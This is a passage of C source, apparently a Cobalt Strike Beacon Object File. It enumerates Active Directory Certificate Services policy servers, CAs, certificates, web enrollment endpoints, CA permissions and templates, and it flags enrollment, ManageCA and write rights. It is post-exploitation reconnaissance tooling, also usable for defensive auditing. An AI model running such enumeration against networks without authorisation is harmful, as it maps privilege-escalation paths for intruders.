	IX509PolicyServerUrl * pPolicyServerUrl = NULL;
		
	CLSID	CLSID_IX509PolicyServerListManager = { 0x91f39029, 0x217f, 0x11DA, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
	IID		IID_IX509PolicyServerListManager = { 0x884e204b, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };

	SAFE_RELEASE(pPolicyServerListManager);
	hr = OLE32$CoCreateInstance(&CLSID_IX509PolicyServerListManager, 0,	CLSCTX_INPROC_SERVER, &IID_IX509PolicyServerListManager, (LPVOID *)&(pPolicyServerListManager));
	CHECK_RETURN_FAIL("CoCreateInstance(CLSID_IX509PolicyServerListManager)", hr);

	hr = pPolicyServerListManager->lpVtbl->Initialize(pPolicyServerListManager, ContextUser, PsfLocationGroupPolicy | PsfLocationRegistry);
	CHECK_RETURN_FAIL("pPolicyServerListManager->lpVtbl->Initialize()", hr);

	hr = pPolicyServerListManager->lpVtbl->get_Count(pPolicyServerListManager, &lPolicyServerUrlCount);
	CHECK_RETURN_FAIL("pPolicyServerListManager->lpVtbl->get_Count()", hr);

	internal_printf("\n[*] Found %ld policy servers\n", lPolicyServerUrlCount);
	for(LONG lPolicyServerIndex=0; lPolicyServerIndex<lPolicyServerUrlCount; lPolicyServerIndex++)
	{
		SAFE_RELEASE(pPolicyServerUrl);
		hr = pPolicyServerListManager->lpVtbl->get_ItemByIndex(pPolicyServerListManager, lPolicyServerIndex, &pPolicyServerUrl);
		CHECK_RETURN_FAIL("pPolicyServerListManager->lpVtbl->get_ItemByIndex()", hr);

		hr = _adcs_get_PolicyServerUrl(pPolicyServerUrl);
		CHECK_RETURN_SOFT_FAIL("[SOFT FAIL] _adcs_get_PolicyServerUrl()", hr);

		if (FAILED(hr)){
			internal_printf("    Failed to display information for the Policy Server \n");
		}
	} // end for loop through IX509PolicyServerUrl

	hr = S_OK;

	//internal_printf("\n _adcs_get_PolicyServerListManager SUCCESS.\n");

fail:

	SAFE_RELEASE(pPolicyServerUrl);
	SAFE_RELEASE(pPolicyServerListManager);

	return hr;
} // end _adcs_get_PolicyServerListManager


HRESULT _adcs_get_PolicyServerUrl(IX509PolicyServerUrl * pPolicyServerUrl)
{
	HRESULT hr = S_OK;
	BSTR bstrPolicyServerUrl = NULL;
	BSTR bstrPolicyServerFriendlyName = NULL;
	BSTR bstrPolicyServerId = NULL;

	hr = pPolicyServerUrl->lpVtbl->get_Url(pPolicyServerUrl, &bstrPolicyServerUrl);
	CHECK_RETURN_FAIL("pPolicyServerUrl->lpVtbl->get_Url()", hr);

	hr = pPolicyServerUrl->lpVtbl->GetStringProperty(pPolicyServerUrl, PsPolicyID, &bstrPolicyServerId);
	CHECK_RETURN_FAIL("pPolicyServerUrl->lpVtbl->GetStringProperty(PsPolicyID)", hr);

	hr = pPolicyServerUrl->lpVtbl->GetStringProperty(pPolicyServerUrl, PsFriendlyName, &bstrPolicyServerFriendlyName);
	CHECK_RETURN_FAIL("pPolicyServerUrl->lpVtbl->GetStringProperty(PsFriendlyName)", hr);
	internal_printf("\n[*] Enumerating enrollment policy servers for %S...\n", bstrPolicyServerFriendlyName);

	hr = _adcs_get_EnrollmentPolicyServer(bstrPolicyServerUrl, bstrPolicyServerId);
	CHECK_RETURN_FAIL("_adcs_get_EnrollmentPolicyServer()", hr);

	hr = S_OK;

	//internal_printf("\n _adcs_get_PolicyServerUrl SUCCESS.\n");

fail:

	SAFE_FREE(bstrPolicyServerUrl);
	SAFE_FREE(bstrPolicyServerFriendlyName);
	SAFE_FREE(bstrPolicyServerId);

	return hr;
} // end _adcs_get_PolicyServerUrl


HRESULT _adcs_get_EnrollmentPolicyServer(BSTR bstrPolicyServerUrl, BSTR bstrPolicyServerId)
{
	HRESULT hr = S_OK;
	IX509EnrollmentPolicyServer * pEnrollmentPolicyServer = NULL;
	ICertificationAuthorities * pCAs = NULL;
	LONG lCAsCount = 0;
	ICertificationAuthority * pCertificateAuthority = NULL;
	IX509CertificateTemplates * pCertificateTemplates = NULL;
	LONG lCertificateTemplatesCount = 0;
	IX509CertificateTemplate * pCertificateTemplate = NULL;

	CLSID	CLSID_CX509EnrollmentPolicyActiveDirectory = { 0x91f39027, 0x217f, 0x11DA, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
	IID		IID_IX509EnrollmentPolicyServer = { 0x13b79026, 0x2181, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };

	SAFE_RELEASE(pEnrollmentPolicyServer);
	hr = OLE32$CoCreateInstance( &CLSID_CX509EnrollmentPolicyActiveDirectory, 0, CLSCTX_INPROC_SERVER, &IID_IX509EnrollmentPolicyServer, (LPVOID *)&(pEnrollmentPolicyServer));
	CHECK_RETURN_FAIL("CoCreateInstance()", hr);

	hr = pEnrollmentPolicyServer->lpVtbl->Initialize(pEnrollmentPolicyServer, bstrPolicyServerUrl, bstrPolicyServerId, X509AuthKerberos, TRUE, ContextUser);
	CHECK_RETURN_FAIL("pEnrollmentPolicyServer->lpVtbl->Initialize()", hr);

	hr = pEnrollmentPolicyServer->lpVtbl->LoadPolicy(pEnrollmentPolicyServer, LoadOptionReload);
	CHECK_RETURN_FAIL("pEnrollmentPolicyServer->lpVtbl->LoadPolicy()", hr);

	SAFE_RELEASE(pCAs);
	hr = pEnrollmentPolicyServer->lpVtbl->GetCAs(pEnrollmentPolicyServer, &pCAs);
	CHECK_RETURN_FAIL("pEnrollmentPolicyServer->lpVtbl->GetCAs()", hr);

	hr = pCAs->lpVtbl->get_Count(pCAs, &lCAsCount);
	CHECK_RETURN_FAIL("pCAs->lpVtbl->get_Count()", hr);
	internal_printf("\n[*] Found %ld CAs\n", lCAsCount);

	for(LONG lCAsIndex=0; lCAsIndex<lCAsCount; lCAsIndex++)
	{
		SAFE_RELEASE(pCertificateAuthority);
		hr = pCAs->lpVtbl->get_ItemByIndex(pCAs, lCAsIndex, &pCertificateAuthority);
		CHECK_RETURN_FAIL("pCAs->lpVtbl->get_ItemByIndex()", hr);

		hr = _adcs_get_CertificationAuthority(pCertificateAuthority);
		CHECK_RETURN_SOFT_FAIL("[SOFT FAIL] _adcs_get_CertificationAuthority()", hr);

		if (FAILED(hr)){
			internal_printf("    Failed to display information for the CertificationAuthority \n");
		}
	} // end for loop through ICertificationAuthority

	SAFE_RELEASE(pCertificateTemplates);
	hr = pEnrollmentPolicyServer->lpVtbl->GetTemplates(pEnrollmentPolicyServer,	&pCertificateTemplates);
	CHECK_RETURN_FAIL("pEnrollmentPolicyServer->lpVtbl->GetTemplates()", hr);

	hr = pCertificateTemplates->lpVtbl->get_Count(pCertificateTemplates, &lCertificateTemplatesCount);
	CHECK_RETURN_FAIL("pCertificateTemplates->lpVtbl->get_Count()", hr);
	internal_printf("\n[*] Found %ld templates\n", lCertificateTemplatesCount);

	for(LONG lCertificateTemplatesIndex=0; lCertificateTemplatesIndex<lCertificateTemplatesCount; lCertificateTemplatesIndex++)
	{
		SAFE_RELEASE(pCertificateTemplate);
		hr = pCertificateTemplates->lpVtbl->get_ItemByIndex(pCertificateTemplates, lCertificateTemplatesIndex, &pCertificateTemplate);
		CHECK_RETURN_FAIL("pCertificateTemplates->lpVtbl->get_ItemByIndex()", hr);

		hr = _adcs_get_CertificateTemplate(pCertificateTemplate);
		CHECK_RETURN_SOFT_FAIL("[SOFT FAIL] _adcs_get_CertificateTemplate()", hr);

		if (FAILED(hr)){
			internal_printf("    Failed to display information for the CertificateTemplate \n");
		}
	} // end for loop through ITemplates
	
	hr = S_OK;

	//internal_printf("\n _adcs_get_EnrollmentPolicyServer SUCCESS.\n");

fail:

	SAFE_RELEASE(pCertificateAuthority);
	SAFE_RELEASE(pCAs);
	SAFE_RELEASE(pEnrollmentPolicyServer);

	return hr;
} // end _adcs_get_EnrollmentPolicyServer


HRESULT _adcs_get_CertificationAuthority(ICertificationAuthority * pCertificateAuthority)
{
	HRESULT hr = S_OK;
	VARIANT varProperty;

	OLEAUT32$VariantInit(&varProperty);

	OLEAUT32$VariantClear(&varProperty);
	pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropCommonName, &varProperty);
	CHECK_RETURN_FAIL("pCertificateAuthority->lpVtbl->get_Property(CAPropCommonName)", hr);
	internal_printf("\n[*] Listing info about the Enterprise CA '%S'\n", varProperty.bstrVal);
	internal_printf("    Enterprise CA Name       : %S\n", varProperty.bstrVal);

	OLEAUT32$VariantClear(&varProperty);
	pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropDNSName, &varProperty);
	CHECK_RETURN_FAIL("pCertificateAuthority->lpVtbl->get_Property(CAPropDNSName)", hr);
	internal_printf("    DNS Hostname             : %S\n", varProperty.bstrVal);

	OLEAUT32$VariantClear(&varProperty);
	pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropDistinguishedName,	&varProperty);
	CHECK_RETURN_FAIL("pCertificateAuthority->lpVtbl->get_Property(CAPropDistinguishedName)", hr);
	if (varProperty.pdispVal)
	{
		BSTR bstrName = NULL;
		IX500DistinguishedName * pDistinguishedName = (IX500DistinguishedName*)varProperty.pdispVal;
		hr = pDistinguishedName->lpVtbl->get_Name(pDistinguishedName, &bstrName);
		CHECK_RETURN_FAIL("pDistinguishedName->lpVtbl->get_Name()", hr);
		internal_printf("    Distinguished Name       : %S\n", bstrName);
	}

	OLEAUT32$VariantClear(&varProperty);
	pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropCertificate, &varProperty);
	CHECK_RETURN_FAIL("pCertificateAuthority->lpVtbl->get_Property(CAPropCertificate)", hr);
	internal_printf("    CA Certificate           :\n");
	hr = _adcs_get_CertificationAuthorityCertificate(&varProperty);
	CHECK_RETURN_FAIL("_adcs_get_CertificationAuthorityCertificate()", hr);
	
	OLEAUT32$VariantClear(&varProperty);
	hr = pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropSecurity, &varProperty);
	CHECK_RETURN_FAIL("pCertificateAuthority->lpVtbl->get_Property(CAPropSecurity)", hr);
	internal_printf("    CA Permissions           :\n");
	hr = _adcs_get_CertificationAuthoritySecurity(varProperty.bstrVal);
	CHECK_RETURN_FAIL("_adcs_get_CertificationAuthoritySecurity()", hr);

	OLEAUT32$VariantClear(&varProperty);
	pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropWebServers, &varProperty);
	internal_printf("    Web Servers              :\n");
	hr = _adcs_get_CertificationAuthorityWebServers(&varProperty);
	CHECK_RETURN_FAIL("_adcs_get_CertificationAuthorityWebServers()", hr);

	OLEAUT32$VariantClear(&varProperty);
	hr = pCertificateAuthority->lpVtbl->get_Property(pCertificateAuthority, CAPropCertificateTypes, &varProperty);
	// CHECK_RETURN_FAIL("pCertificateAuthority->lpVtbl->get_Property(CAPropCertificateTypes)", hr);
	internal_printf("    Templates                :\n");
	hr = _adcs_get_CertificationAuthorityCertificateTypes(&varProperty);
	CHECK_RETURN_FAIL("_adcs_get_CertificationAuthorityCertificateTypes()", hr);

	hr = S_OK;

	//internal_printf("\n _adcs_get_CertificationAuthority SUCCESS.\n");

fail:

	OLEAUT32$VariantClear(&varProperty);

	return hr;
} // end _adcs_get_CertificationAuthority


HRESULT _adcs_get_CertificationAuthorityCertificate(VARIANT* lpvarCertifcate)
{
	HRESULT hr = S_OK;
	LPBYTE lpCertificate = NULL;
	ULONG ulCertificateSize = 0;
	PCCERT_CONTEXT  pCert = NULL; 
	BOOL bReturn = TRUE;
	DWORD dwStrType = CERT_X500_NAME_STR;
	LPWSTR swzNameString = NULL;
	DWORD cchNameString = 0;
	PBYTE lpThumbprint = NULL;
	DWORD cThumbprint = 0;
	SYSTEMTIME systemTime;
	CERT_CHAIN_PARA chainPara;
	PCCERT_CHAIN_CONTEXT pCertChainContext = NULL;

	// check buffer
	if (NULL == lpvarCertifcate->parray)
	{
		internal_printf("      N/A\n");
		goto fail;
	}
		
	// Get a certificate context
	ulCertificateSize = lpvarCertifcate->parray->rgsabound->cElements;
	hr = OLEAUT32$SafeArrayAccessData( lpvarCertifcate->parray, (void**)(&lpCertificate) );
	CHECK_RETURN_FAIL("SafeArrayAccessData", hr);
	pCert = CRYPT32$CertCreateCertificateContext( 1, lpCertificate, ulCertificateSize );
	hr = OLEAUT32$SafeArrayUnaccessData( lpvarCertifcate->parray );
	CHECK_RETURN_FAIL("SafeArrayUnaccessData", hr);
	CHECK_RETURN_NULL("CertCreateCertificateContext()", pCert, hr);
	
	// subject name
	cchNameString = CRYPT32$CertGetNameStringW( pCert, CERT_NAME_RDN_TYPE, 0, &dwStrType, swzNameString, cchNameString );
	swzNameString = intAlloc(cchNameString*sizeof(WCHAR));
	CHECK_RETURN_NULL("intAlloc()", swzNameString, hr);
	if (1 == CRYPT32$CertGetNameStringW( pCert, CERT_NAME_RDN_TYPE, 0, &dwStrType, swzNameString, cchNameString ))
	{
		hr = E_UNEXPECTED;
		BeaconPrintf(CALLBACK_ERROR, "CertGetNameStringW failed: 0x%08lx\n", hr);
		goto fail;
	}
	internal_printf("      Subject Name           : %S\n", swzNameString);
	SAFE_INT_FREE(swzNameString);

	// thumbprint
	CRYPT32$CertGetCertificateContextProperty( pCert, CERT_SHA1_HASH_PROP_ID, lpThumbprint, &cThumbprint );
	lpThumbprint = intAlloc(cThumbprint);
	CHECK_RETURN_NULL("intAlloc()", lpThumbprint, hr);
	bReturn = CRYPT32$CertGetCertificateContextProperty( pCert, CERT_SHA1_HASH_PROP_ID, lpThumbprint, &cThumbprint );
	CHECK_RETURN_FALSE("CertGetCertificateContextProperty(CERT_SHA1_HASH_PROP_ID)", bReturn, hr);
	internal_printf("      Thumbprint             : ");
	for(DWORD i=0; i<cThumbprint; i++)
	{
		internal_printf("%02x", lpThumbprint[i]);
	}
	internal_printf("\n");
	SAFE_INT_FREE(lpThumbprint);

	// serial number
	internal_printf("      Serial Number          : ");
	for(DWORD i=0; i<pCert->pCertInfo->SerialNumber.cbData; i++)
	{
		internal_printf("%02x", pCert->pCertInfo->SerialNumber.pbData[i]);
	}
	internal_printf("\n");

	// start date
	MSVCRT$memset(&systemTime, 0, sizeof(SYSTEMTIME));
	KERNEL32$FileTimeToSystemTime(&(pCert->pCertInfo->NotBefore), &systemTime);
	internal_printf("      Start Date             : %hu/%hu/%hu %02hu:%02hu:%02hu\n", systemTime.wMonth, systemTime.wDay, systemTime.wYear, systemTime.wHour, systemTime.wMinute, systemTime.wSecond);

	// end date
	MSVCRT$memset(&systemTime, 0, sizeof(SYSTEMTIME));
	KERNEL32$FileTimeToSystemTime(&(pCert->pCertInfo->NotAfter), &systemTime);
	internal_printf("      End Date               : %hu/%hu/%hu %02hu:%02hu:%02hu\n", systemTime.wMonth, systemTime.wDay, systemTime.wYear, systemTime.wHour, systemTime.wMinute, systemTime.wSecond);

	// chain
	chainPara.cbSize = sizeof(CERT_CHAIN_PARA);
	chainPara.RequestedUsage.dwType = USAGE_MATCH_TYPE_AND;
	chainPara.RequestedUsage.Usage.cUsageIdentifier = 0;
	chainPara.RequestedUsage.Usage.rgpszUsageIdentifier = NULL;
	bReturn = CRYPT32$CertGetCertificateChain( NULL, pCert, NULL, NULL, &chainPara, 0, NULL, &pCertChainContext );
	CHECK_RETURN_FALSE("CertGetCertificateChain()", bReturn, hr);
	internal_printf("      Chain                  :");
	for(DWORD i=0; i<pCertChainContext->cChain; i++)
	{
		for(DWORD j=0; j<pCertChainContext->rgpChain[i]->cElement; j++)
		{
			PCCERT_CONTEXT pChainCertContext = pCertChainContext->rgpChain[i]->rgpElement[j]->pCertContext;

			// subject name
			cchNameString = CRYPT32$CertGetNameStringW( pChainCertContext, CERT_NAME_RDN_TYPE, 0, &dwStrType, swzNameString, cchNameString );
			swzNameString = intAlloc(cchNameString*sizeof(WCHAR));
			CHECK_RETURN_NULL("intAlloc()", swzNameString, hr);
			if (1 == CRYPT32$CertGetNameStringW( pChainCertContext, CERT_NAME_RDN_TYPE, 0, &dwStrType, swzNameString, cchNameString ))
			{
				hr = E_UNEXPECTED;
				BeaconPrintf(CALLBACK_ERROR, "CertGetNameStringW failed: 0x%08lx\n", hr);
				goto fail;
			}
			if (j!=0) { internal_printf(" >>"); }
			internal_printf(" %S", swzNameString);
			SAFE_INT_FREE(swzNameString);
		} // end for loop through PCERT_CHAIN_ELEMENT
		internal_printf("\n");
	} // end for loop through PCERT_SIMPLE_CHAIN

	hr = S_OK;

	//internal_printf("\n _adcs_get_CertificationAuthorityCertificate SUCCESS.\n");

fail:

	SAFE_CERTFREECERTIFICATECHAIN(pCertChainContext);

	SAFE_INT_FREE(swzNameString);

	SAFE_INT_FREE(lpThumbprint);

	if (pCert)
	{
		CRYPT32$CertFreeCertificateContext(pCert);
		pCert = NULL;
	}

	return hr;
} // end _adcs_get_CertificationAuthorityCertificate


HRESULT _adcs_get_CertificationAuthorityWebServers(VARIANT* lpvarWebServers)
{
	HRESULT hr = S_OK;
	LONG lItemIdx = 0;
	BSTR bstrWebServer = NULL;
	LPWSTR swzTokenize = NULL;

	if ( NULL == lpvarWebServers->parray)
	{
		internal_printf("      N/A\n");
		goto fail;
	}
	
	hr = OLEAUT32$SafeArrayGetElement(lpvarWebServers->parray, &lItemIdx, &bstrWebServer);
	while(SUCCEEDED(hr))
	{
		ULONG dwWebServerCount = 0;
		LPWSTR swzToken = NULL;
		LPWSTR swzNextToken = NULL;
		UINT dwTokenizeLength = OLEAUT32$SysStringLen(bstrWebServer);
		swzTokenize = (LPWSTR)intAlloc(sizeof(WCHAR)*(dwTokenizeLength+1));
		CHECK_RETURN_NULL("intAlloc()", swzTokenize, hr);
		MSVCRT$wcscpy(swzTokenize, bstrWebServer);

		// Get the number of entries in the array
		swzToken = MSVCRT$wcstok_s(swzTokenize, L"\n", &swzNextToken);
		dwWebServerCount = MSVCRT$wcstoul(swzToken, NULL, 10);
		for(ULONG ulWebEnrollmentServerIndex=0; ulWebEnrollmentServerIndex<dwWebServerCount; ulWebEnrollmentServerIndex++)
		{
			// Get the authentication type
			swzToken = MSVCRT$wcstok_s(NULL, L"\n", &swzNextToken);
			if (NULL == swzToken) {	break; }
			// Get the Priority
			swzToken = MSVCRT$wcstok_s(NULL, L"\n", &swzNextToken);
			if (NULL == swzToken) {	break; }
			// Get the Uri
			swzToken = MSVCRT$wcstok_s(NULL, L"\n", &swzNextToken);
			if (NULL == swzToken) {	break; }
			internal_printf("      %S\n", swzToken);
			// Get the RenewalOnly flag
			swzToken = MSVCRT$wcstok_s(NULL, L"\n", &swzNextToken);
			if (NULL == swzToken) {	break; }
		}

		SAFE_INT_FREE(swzTokenize);

		++lItemIdx;
		hr = OLEAUT32$SafeArrayGetElement(lpvarWebServers->parray, &lItemIdx, &bstrWebServer);	
	}

	hr = S_OK;

	//internal_printf("\n _adcs_get_CertificationAuthorityWebServers SUCCESS.\n");

fail:

	SAFE_INT_FREE(swzTokenize);

	return hr;
} // end _adcs_get_CertificationAuthorityWebServers


HRESULT _adcs_get_CertificationAuthoritySecurity(BSTR bstrDacl)
{
	HRESULT hr = S_OK;
	BOOL bReturn = TRUE;
	PSID pOwner = NULL;
	BOOL bOwnerDefaulted = TRUE;
	LPWSTR swzStringSid = NULL;
	WCHAR swzName[MAX_PATH];
	DWORD cchName = MAX_PATH;
	WCHAR swzDomainName[MAX_PATH];
	DWORD cchDomainName = MAX_PATH;
	BOOL bDaclPresent = TRUE;
	PACL pDacl = NULL;
	BOOL bDaclDefaulted = TRUE;
	ACL_SIZE_INFORMATION aclSizeInformation;
	SID_NAME_USE sidNameUse;
	PSECURITY_DESCRIPTOR pSD = NULL;
	ULONG ulSDSize = 0;

	// Get the security descriptor
	if (NULL == bstrDacl)
	{
		internal_printf("      N/A\n");
		goto fail;
	}
	bReturn = ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorW(bstrDacl, SDDL_REVISION_1, (PSECURITY_DESCRIPTOR)(&pSD), &ulSDSize);
	CHECK_RETURN_FALSE("ConvertStringSecurityDescriptorToSecurityDescriptorW()", bReturn, hr);

	// Get the owner
	bReturn = ADVAPI32$GetSecurityDescriptorOwner(pSD, &pOwner, &bOwnerDefaulted);
	CHECK_RETURN_FALSE("GetSecurityDescriptorOwner()", bReturn, hr);
	internal_printf("      Owner                  : ");
	cchName = MAX_PATH;
	MSVCRT$memset(swzName, 0, cchName*sizeof(WCHAR));
	cchDomainName = MAX_PATH;
	MSVCRT$memset(swzDomainName, 0, cchDomainName*sizeof(WCHAR));
	if (ADVAPI32$LookupAccountSidW(	NULL, pOwner, swzName, &cchName, swzDomainName, &cchDomainName, &sidNameUse )) { internal_printf("%S\\%S", swzDomainName, swzName); }
	else { internal_printf("N/A"); }

	// Get the owner's SID
	if (ADVAPI32$ConvertSidToStringSidW(pOwner, &swzStringSid)) { internal_printf("\n                               %S\n", swzStringSid); }
	else { internal_printf("\n                               N/A\n"); }
	SAFE_LOCAL_FREE(swzStringSid);

	// Get the DACL
	bReturn = ADVAPI32$GetSecurityDescriptorDacl(pSD, &bDaclPresent, &pDacl, &bDaclDefaulted);
	CHECK_RETURN_FALSE("GetSecurityDescriptorDacl()", bReturn, hr);
	internal_printf("      Access Rights          :\n");
	if (FALSE == bDaclPresent) { internal_printf("          N/A\n"); goto fail; }

	// Loop through the ACEs in the ACL
	if ( ADVAPI32$GetAclInformation( pDacl, &aclSizeInformation, sizeof(aclSizeInformation), AclSizeInformation ) )
	{
		for(DWORD dwAceIndex=0; dwAceIndex<aclSizeInformation.AceCount; dwAceIndex++)
		{
			ACE_HEADER * pAceHeader = NULL;
			ACCESS_ALLOWED_ACE* pAce = NULL;
			ACCESS_ALLOWED_OBJECT_ACE* pAceObject = NULL;
			PSID pPrincipalSid = NULL;
			hr = E_UNEXPECTED;

			if ( ADVAPI32$GetAce( pDacl, dwAceIndex, (LPVOID)&pAceHeader ) )
			{
				pAceObject = (ACCESS_ALLOWED_OBJECT_ACE*)pAceHeader;
				pAce = (ACCESS_ALLOWED_ACE*)pAceHeader;
				int format_ACCESS_ALLOWED_OBJECT_ACE = 0;

				if (ACCESS_ALLOWED_OBJECT_ACE_TYPE == pAceHeader->AceType) {
					//internal_printf("        AceType: ACCESS_ALLOWED_OBJECT_ACE_TYPE\n");
					format_ACCESS_ALLOWED_OBJECT_ACE = 1;
					pPrincipalSid = (PSID)(&(pAceObject->InheritedObjectType)); 
				}
				else if (ACCESS_ALLOWED_ACE_TYPE == pAceHeader->AceType) { 
					//internal_printf("        AceType: ACCESS_ALLOWED_ACE_TYPE\n");
					pPrincipalSid = (PSID)(&(pAce->SidStart)); 
				}
				else { continue; }

				// Get the principal
				cchName = MAX_PATH;
				MSVCRT$memset(swzName, 0, cchName*sizeof(WCHAR));
				cchDomainName = MAX_PATH;
				MSVCRT$memset(swzDomainName, 0, cchDomainName*sizeof(WCHAR));
				if (FALSE == ADVAPI32$LookupAccountSidW( NULL, pPrincipalSid, swzName, &cchName, swzDomainName,	&cchDomainName,	&sidNameUse	))
				{ continue; }

				swzStringSid = NULL;
				if (ADVAPI32$ConvertSidToStringSidW(pPrincipalSid, &swzStringSid)) { 
					internal_printf("        Principal           : %S\\%S (%S)\n", swzDomainName, swzName,swzStringSid); }
				else { 
					internal_printf("        Principal           : %S\\%S (N/A)\n", swzDomainName, swzName); }
				SAFE_LOCAL_FREE(swzStringSid);

				// pAceObject->Mask is always equal to pAce->Mask, not "perfect" but seems to work
				internal_printf("          Access mask       : %08X\n", pAceObject->Mask);
				internal_printf("          Flags             : %08X\n", pAceObject->Flags);
					
				if (format_ACCESS_ALLOWED_OBJECT_ACE) {
					// flags not defined in ACCESS_ALLOWED_ACE_TYPE
					internal_printf("          Flags             : %08X\n", pAceObject->Flags);

					// Check if Enrollment permission
					if (ADS_RIGHT_DS_CONTROL_ACCESS & pAceObject->Mask)
					{
						if (ACE_OBJECT_TYPE_PRESENT & pAceObject->Flags)
						{
							OLECHAR szGuid[MAX_PATH];
							if ( OLE32$StringFromGUID2(&pAceObject->ObjectType, szGuid, MAX_PATH) )
							{
								internal_printf("                              Extended right %S\n", szGuid);
							}
							if (
								(!MSVCRT$memcmp(&CertificateEnrollment, &pAceObject->ObjectType, sizeof (GUID))) ||
								(!MSVCRT$memcmp(&CertificateAutoEnrollment, &pAceObject->ObjectType, sizeof (GUID))) ||
								(!MSVCRT$memcmp(&CertificateAll, &pAceObject->ObjectType, sizeof (GUID)))
								)
							{
								internal_printf("                              Enrollment Rights\n");
							}
							else if (
								(!MSVCRT$memcmp(&ManageCA, &pAceObject->ObjectType, sizeof (GUID)))
								)
							{
								internal_printf("                              ManageCA Rights\n");
							}
						} // end if ACE_OBJECT_TYPE_PRESENT
					} // end if ADS_RIGHT_DS_CONTROL_ACCESS
				}
				
				// Check if ADS_RIGHT_GENERIC_ALL permission
				if (ADS_RIGHT_GENERIC_ALL & pAceObject->Mask)
				{
					internal_printf("                              Generic All Rights\n");
				} // end if ADS_RIGHT_GENERIC_ALL permission
				
				// Check if ADS_RIGHT_READ_CONTROL permission
				if ( 
					(ADS_RIGHT_READ_CONTROL & pAceObject->Mask)
				)
				{
					internal_printf("                              Read Rights\n");
				} // end if ADS_RIGHT_READ_CONTROL permission

				// Check if ADS_RIGHT_WRITE_OWNER permission
				if ( 
					(ADS_RIGHT_WRITE_OWNER & pAceObject->Mask)
				)
				{
					internal_printf("                              WriteOwner Rights\n");
				} // end if ADS_RIGHT_WRITE_OWNER permission
				
				// Check if ADS_RIGHT_WRITE_DAC permission
				if ( 
					(ADS_RIGHT_WRITE_DAC & pAceObject->Mask)
				)
				{
					internal_printf("                              WriteDacl Rights\n");
				} // end if ADS_RIGHT_WRITE_DAC permission
				
				// Check if ADS_RIGHT_GENERIC_WRITE permission
				if ( 
					(ADS_RIGHT_GENERIC_WRITE & pAceObject->Mask)
				)
				{
					internal_printf("                              WriteProperty All Rights\n");
				} // end if ADS_RIGHT_GENERIC_WRITE permission

				// Check if ADS_RIGHT_DS_WRITE_PROP permission
				if ( 
					(ADS_RIGHT_DS_WRITE_PROP & pAceObject->Mask)
				)
				{
					if (format_ACCESS_ALLOWED_OBJECT_ACE) {

						internal_printf("                              WriteProperty Rights on ");
						OLECHAR szGuid[MAX_PATH];
						if ( OLE32$StringFromGUID2(&pAceObject->ObjectType, szGuid, MAX_PATH) )
						{
							internal_printf("%S\n", szGuid);
						}
						else
						{
							internal_printf("{ERROR}\n");
						}
					}
					else {
						// if ACCESS_OBJECT_ACE, there is no ACE_OBJECT_TYPE_PRESENT and ObjectType, so it's like a GENERIC_WRITE
						internal_printf("                              WriteProperty All Rights\n");
					}

				} // end if ADS_RIGHT_DS_WRITE_PROP permission

			} // end if GetAce was successful
		} // end for loop through ACEs (AceCount)
	} // end else GetAclInformation was successful

	hr = S_OK;

	//internal_printf("\n _adcs_get_CertificationAuthoritySecurity SUCCESS.\n");

fail:

	SAFE_LOCAL_FREE(swzStringSid);
	SAFE_LOCAL_FREE(pSD);

	return hr;
} // end _adcs_get_CertificationAuthoritySecurity


HRESULT _adcs_get_CertificationAuthorityCertificateTypes(VARIANT* lpvarArray)
{
	HRESULT hr = S_OK;
	LONG lItemIdx = 0;
	BSTR bstrItem = NULL;

	if (NULL == lpvarArray->parray)
	{
		internal_printf("      N/A\n");
		goto fail;
	}
	
	hr = OLEAUT32$SafeArrayGetElement(lpvarArray->parray, &lItemIdx, &bstrItem);
	while(SUCCEEDED(hr))
	{
		if (bstrItem) { internal_printf("      %S\n", bstrItem); }
		else { internal_printf("      N/A\n"); }

		++lItemIdx;
		hr = OLEAUT32$SafeArrayGetElement(lpvarArray->parray, &lItemIdx, &bstrItem);	
	}

	hr = S_OK;

	//internal_printf("\n _adcs_get_CertificationAuthorityCertificateTypes SUCCESS.\n");

fail:

	return hr;
} // end _adcs_get_CertificationAuthorityCertificateTypes


HRESULT _adcs_get_CertificateTemplate(IX509CertificateTemplate * pCertificateTemplate)
{
	HRESULT hr = S_OK;
	VARIANT varProperty;

	OLEAUT32$VariantInit(&varProperty);

	// Get the TemplatePropCommonName
	OLEAUT32$VariantClear(&varProperty);
	hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropCommonName, &varProperty);
	CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropCommonName)", hr);
	internal_printf("\n[*] Listing info about the template '%S'\n", varProperty.bstrVal);
	internal_printf("    Template Name            : %S\n", varProperty.bstrVal);

	// Get the TemplatePropFriendlyName
	OLEAUT32$VariantClear(&varProperty);
	hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropFriendlyName, &varProperty);
	CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropFriendlyName)", hr);
	internal_printf("    Template Friendly Name   : %S\n", varProperty.bstrVal);
	
	// Get the TemplatePropValidityPeriod
	OLEAUT32$VariantClear(&varProperty);
	hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropValidityPeriod, &varProperty);
	CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropValidityPeriod)", hr);
	internal_printf("    Validity Period          : %ld years (%ld seconds)\n", varProperty.lVal/31536000, varProperty.lVal);

	// Get the TemplatePropRenewalPeriod
	OLEAUT32$VariantClear(&varProperty);
	hr = pCertificateTemplate->lpVtbl->get_Property(pCertificateTemplate, TemplatePropRenewalPeriod, &varProperty);
	CHECK_RETURN_FAIL("pCertificateTemplate->lpVtbl->get_Property(TemplatePropRenewalPeriod)", hr);
